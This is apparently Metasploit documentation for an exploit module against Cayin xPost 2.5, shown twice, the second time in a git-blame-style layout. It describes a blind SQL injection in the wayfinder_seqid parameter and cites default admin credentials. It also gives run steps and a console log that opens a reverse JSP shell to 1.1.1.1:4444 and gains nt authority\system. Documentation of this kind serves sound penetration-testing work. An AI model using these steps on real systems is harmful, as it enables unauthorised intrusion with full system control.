documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md

## Vulnerable Application

This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. 
The `wayfinder_meeting_input.jsp` file's `wayfinder_seqid` parameter can 
be injected with a blind SQLi. Since this app bundles MySQL and Apache 
Tomcat the environment is pretty static and therefore the default 
settings should work. Results in SYSTEM level access. Only the 
`java/jsp_shell_reverse_tcp` and `java/jsp_shell_bind_tcp` payloads seem 
to be valid.

Default authentication for the system is administrator:admin from
[Guide](http://onlinehelp.cayintech.com/xPost/PDF/MAXP20EN110504-l.pdf) page 16

## Verification Steps

  1. Install the application and start it
  2. Start msfconsole
  3. Do: ```exploit/windows/http/cayin_xpost_sql_rce```
  4. Do: ```set rhosts [ip]```
  5. Do: ```run```
  6. You should get a shell.

## Options

### LOCALWEBROOT

Path to the `webapps` folder for Cayin.  Defaults to `C:/CayinApps/webapps/`

## Scenarios

### Cayin xPost 2.5 on Windows 10.0.16299.125

  ```
  [*] Processing xpost.rb for ERB directives.
  resource (xpost.rb)> use exploit/windows/http/cayin_xpost_sql_rce
  resource (xpost.rb)> set payload java/jsp_shell_reverse_tcp
  payload => java/jsp_shell_reverse_tcp
  resource (xpost.rb)> set rhosts 2.2.2.2
  rhosts => 2.2.2.2
  resource (xpost.rb)> set lhost 1.1.1.1
  lhost => 1.1.1.1
  resource (xpost.rb)> set verbose true
  verbose => true
  resource (xpost.rb)> exploit
  [*] Started reverse TCP handler on 1.1.1.1:4444 
  [*] Utilizing payload filename cY0bWf1Rh6C9.jsp
  [*] Payload Size: 1499
  [*] Payload Size Encoded: 2998
  [*] Attempting Exploitation
  [*] Triggering uploaded payload
  [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50158) at 2020-06-09 12:20:33 -0400
  [!] Tried to delete C:/CayinApps/webapps/cY0bWf1Rh6C9.jsp, unknown result
  
  
  C:\CayinApps\Tomcat>
  C:\CayinApps\Tomcat>whoami
  whoami
  nt authority\system
  
  C:\CayinApps\Tomcat>ver
  ver
  
  Microsoft Windows [Version 10.0.16299.125]
  
  C:\CayinApps\Tomcat>
  ```
xpost working 2020-06-09 13:07:00 -04:00			`## Vulnerable Application`

cleanup 2020-06-12 10:46:44 -04:00			`This module exploits an unauthenticated SQLi in Cayin xPost <=2.5.`
			The `wayfinder_meeting_input.jsp` file's `wayfinder_seqid` parameter can
review comments 2020-06-17 11:47:11 -04:00			`be injected with a blind SQLi. Since this app bundles MySQL and Apache`
cleanup 2020-06-12 10:46:44 -04:00			`Tomcat the environment is pretty static and therefore the default`
			`settings should work. Results in SYSTEM level access. Only the`
			`java/jsp_shell_reverse_tcp` and `java/jsp_shell_bind_tcp` payloads seem
			`to be valid.`
xpost working 2020-06-09 13:07:00 -04:00
			`Default authentication for the system is administrator:admin from`
wip 2020-06-10 20:42:22 -04:00			`[Guide](http://onlinehelp.cayintech.com/xPost/PDF/MAXP20EN110504-l.pdf) page 16`
xpost working 2020-06-09 13:07:00 -04:00
			`## Verification Steps`

			`1. Install the application and start it`
			`2. Start msfconsole`
			3. Do: ```exploit/windows/http/cayin_xpost_sql_rce```
			4. Do: ```set rhosts [ip]```
			5. Do: ```run```
			`6. You should get a shell.`

			`## Options`

			`### LOCALWEBROOT`

			Path to the `webapps` folder for Cayin. Defaults to `C:/CayinApps/webapps/`

			`## Scenarios`

			`### Cayin xPost 2.5 on Windows 10.0.16299.125`

			```
			`[*] Processing xpost.rb for ERB directives.`
			`resource (xpost.rb)> use exploit/windows/http/cayin_xpost_sql_rce`
			`resource (xpost.rb)> set payload java/jsp_shell_reverse_tcp`
			`payload => java/jsp_shell_reverse_tcp`
			`resource (xpost.rb)> set rhosts 2.2.2.2`
			`rhosts => 2.2.2.2`
			`resource (xpost.rb)> set lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`resource (xpost.rb)> set verbose true`
			`verbose => true`
			`resource (xpost.rb)> exploit`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Utilizing payload filename cY0bWf1Rh6C9.jsp`
			`[*] Payload Size: 1499`
			`[*] Payload Size Encoded: 2998`
			`[*] Attempting Exploitation`
			`[*] Triggering uploaded payload`
			`[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50158) at 2020-06-09 12:20:33 -0400`
			`[!] Tried to delete C:/CayinApps/webapps/cY0bWf1Rh6C9.jsp, unknown result`


			`C:\CayinApps\Tomcat>`
			`C:\CayinApps\Tomcat>whoami`
			`whoami`
			`nt authority\system`

			`C:\CayinApps\Tomcat>ver`
			`ver`

			`Microsoft Windows [Version 10.0.16299.125]`

			`C:\CayinApps\Tomcat>`
			```